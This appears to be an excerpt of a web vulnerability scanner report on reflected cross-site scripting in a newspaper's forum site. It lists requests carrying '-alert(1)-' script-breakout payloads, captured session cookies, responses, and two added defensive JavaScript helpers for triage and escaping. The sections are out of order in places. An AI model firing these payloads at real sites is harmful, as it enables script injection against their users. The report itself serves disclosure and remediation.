Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2ed"-alert(1)-"68b78d5cb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
3.102. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc8e"-alert(1)-"7edf3fe785f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32485
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e534b"-alert(1)-"d6330c89b46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title ...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
s.pageName="";
s.channel="Forums";
s.prop1="Home";
s.prop2=s.prop1 + " / Opinion";
s.prop3=s.prop2 + " / Forums";
s.prop4=s.prop3 + " / topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv";
s.prop9=getCiQueryString("SOURCE");
s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
s.events="event1";
s.eVar2=getCiQueryString("SOURCE");
s.eVar4=s.pageName;
s ...[SNIP]...
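To re-test these findings after a fix, or to triage a batch of saved responses, what has to be checked is exactly what the issue detail states: whether the canary comes back unmodified, and whether it lands inside a `<script>` block with its double quote intact. The following is an added triage helper, not part of the Burp report; the sample body is constructed here from the response excerpt above (the finding for REST URL parameter 1 of /topic/ferret-theory-lv) and padded with the minimum HTML needed for a complete `<script>` element, so it is not a full capture.

```javascript
// Added example; not part of the Burp report. Classifies how a scanner canary
// is reflected in a saved response body. The sample body below is constructed
// from the report's response excerpt and is not a complete capture.

// Returns [start, end) offsets of the content of every <script> element.
function scriptContentRanges(html) {
  const ranges = [];
  const re = /(<script\b[^>]*>)([\s\S]*?)(<\/script\s*>)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const start = m.index + m[1].length;
    ranges.push({ start, end: start + m[2].length });
  }
  return ranges;
}

// Verdicts:
//   script-breakout   reflected verbatim inside <script>, quote intact
//   html-reflection   reflected verbatim, but only in HTML (a different issue class)
//   reflected-encoded present only with the quote entity-encoded or escaped
//   not-reflected
function classifyReflection(body, payload) {
  const scripts = scriptContentRanges(body);
  const hits = [];
  for (let i = body.indexOf(payload); i !== -1; i = body.indexOf(payload, i + 1)) {
    const inScript = scripts.some((r) => i >= r.start && i + payload.length <= r.end);
    hits.push({ offset: i, context: inScript ? 'script' : 'html' });
  }
  if (hits.length > 0) {
    const verdict = hits.some((h) => h.context === 'script') ? 'script-breakout' : 'html-reflection';
    return { verdict, hits };
  }
  const encodedForms = [
    payload.replace(/"/g, '&quot;'),
    payload.replace(/"/g, '\\"'),
    payload.replace(/"/g, '\\u0022'),
  ];
  if (encodedForms.some((f) => body.includes(f))) return { verdict: 'reflected-encoded', hits };
  return { verdict: 'not-reflected', hits };
}

// Builds a fresh canary in the shape the report uses (<hex5>"-alert(1)-"<hex11>),
// so re-tests can be matched against the original findings.
function makeCanary() {
  const hex = (n) => Array.from({ length: n }, () => '0123456789abcdef'[Math.floor(Math.random() * 16)]).join('');
  return hex(5) + '"-alert(1)-"' + hex(11);
}

// Constructed sample: the SiteCatalyst block from the report's response excerpt
// with the canary from the /topic/ferret-theory-lv finding.
const SAMPLE_PAYLOAD = 'e534b"-alert(1)-"d6330c89b46';
const SAMPLE_BODY =
  '<html><head><title>Forums</title>\n' +
  '<script language="JavaScript">\n' +
  "if (typeof s != 'undefined') {\n" +
  '  s.prop3=s.prop2 + " / Forums";\n' +
  '  s.prop4=s.prop3 + " / topic' + SAMPLE_PAYLOAD + '/ferret-theory-lv";\n' +
  '}\n' +
  '</script></head><body><h1>Page not found</h1></body></html>';

// The same page after a fix that backslash-escapes the quote inside the literal.
const SAMPLE_BODY_FIXED = SAMPLE_BODY.replace(SAMPLE_PAYLOAD, SAMPLE_PAYLOAD.replace(/"/g, '\\"'));

console.log('before fix:', classifyReflection(SAMPLE_BODY, SAMPLE_PAYLOAD).verdict);       // script-breakout
console.log('after fix: ', classifyReflection(SAMPLE_BODY_FIXED, SAMPLE_PAYLOAD).verdict); // reflected-encoded
```

Feed `classifyReflection` the raw body of each saved response together with the payload from the corresponding issue detail; anything still classified `script-breakout` is an open finding, while `reflected-encoded` or `html-reflection` means the script-context issue is closed and only a lower-severity review remains. The check is deliberately literal (exact substring, no HTML decoding), matching the "echoed unmodified" condition the scanner reported.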
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf2d6"-alert(1)-"4e7735b0a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122
3.105. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/ferret-theory-lv
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe24"-alert(1)-"022a6eab7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21162
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2deab"-alert(1)-"4a706fc981a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title ...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
s.pageName="";
s.channel="Forums";
s.prop1="Home";
s.prop2=s.prop1 + " / Opinion";
s.prop3=s.prop2 + " / Forums";
s.prop4=s.prop3 + " / topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war";
s.prop9=getCiQueryString("SOURCE");
s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
s.events="event1";
s.eVar2=getCiQueryString("SOURCE");
s.eVar4=s.pageName;
s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96781"-alert(1)-"1dccca72dc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122
3.108. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/oil-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195d3"-alert(1)-"bbdb9078104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23342
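The remediation detail for this finding says that echoing user data inside a script block is hard to make safe. The following is an added example, not code from the scanner report or from the site it describes: it shows what the 195d3"-alert(1)-"bbdb9078104 payload does once it lands inside a double-quoted JavaScript string, what the mpck-style payload does after the server has decoded %3b to ';', and the escaping a template must apply if the data really cannot be moved out of the script. The page template, the variable name currentUrl and the stubbed alert() are assumptions; the report does not reproduce the real markup.

```javascript
// Added example, not code from the scanner report or from the site it
// describes. The page template is an assumption modelled on the findings
// ("copied into a JavaScript string which is encapsulated in double
// quotation marks"); the real forums.mercurynews.com markup is not shown.

// Payloads quoted in the report: the 3.108 parameter-name payload, and the
// mpck payload as it was echoed after the server decoded %3b to ';'.
const PAYLOADS = [
  '195d3"-alert(1)-"bbdb9078104',
  '892af";alert(1)//60d6637fe36',
];

// Vulnerable pattern: raw request data concatenated into the script.
function renderVulnerable(userData) {
  return 'var currentUrl = "' + userData + '";';
}

// Escape for a JavaScript string literal: every UTF-16 code unit outside
// [A-Za-z0-9] becomes \uXXXX. Quotes, backslash, '<', '/', ';', newlines
// and U+2028/U+2029 are all covered, so the literal can only be closed by
// the template's own quote and "</script>" can never appear in the output.
function escapeForJsString(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const unit = s.charCodeAt(i);
    const alnum = (unit >= 0x30 && unit <= 0x39) ||
                  (unit >= 0x41 && unit <= 0x5a) ||
                  (unit >= 0x61 && unit <= 0x7a);
    out += alnum ? s[i] : '\\u' + unit.toString(16).padStart(4, '0');
  }
  return out;
}

// Hardened pattern: same template, data escaped on the way in.
function renderHardened(userData) {
  return 'var currentUrl = "' + escapeForJsString(userData) + '";';
}

// Evaluate a generated script the way the browser evaluates the inline
// <script>, with alert() stubbed so we can see whether it fired and what
// value the variable ended up holding.
function runScript(script) {
  const alertCalls = [];
  const fn = new Function('alert', script + '\nreturn currentUrl;');
  const currentUrl = fn((x) => { alertCalls.push(x); });
  return { alertCalls, currentUrl };
}

function compare(payload) {
  return {
    vulnerable: runScript(renderVulnerable(payload)),
    hardened: runScript(renderHardened(payload)),
  };
}

for (const p of PAYLOADS) {
  const r = compare(p);
  console.log('payload    :', p);
  console.log('vulnerable :', renderVulnerable(p));
  console.log('  alert fired:', r.vulnerable.alertCalls.length > 0, ' currentUrl =', r.vulnerable.currentUrl);
  console.log('hardened   :', renderHardened(p));
  console.log('  alert fired:', r.hardened.alertCalls.length > 0, ' currentUrl =', r.hardened.currentUrl);
}
```

The scanner uses the "a"-alert(1)-"b" form because it stays syntactically valid JavaScript in both the clean and the injected page (a string minus a function call minus a string) and needs neither a ';' nor a '</script>', so it also survives filters that only strip angle brackets. Escaping as above closes the hole in the template, but the stronger fix is the one the remediation text asks for: do not emit the data inside the script at all, put it in a data attribute or a JSON blob in a non-executing element and read it through DOM APIs.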
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdef6"-alert(1)-"abaffde0a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b93"-alert(1)-"c1260fb02e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134
3.111. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/oil-price-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 363f2"-alert(1)-"de8dec15453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98092
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe5e4"-alert(1)-"7be3daf7363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64259"-alert(1)-"06154ffc603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
3.114. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab401"-alert(1)-"0432824b438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
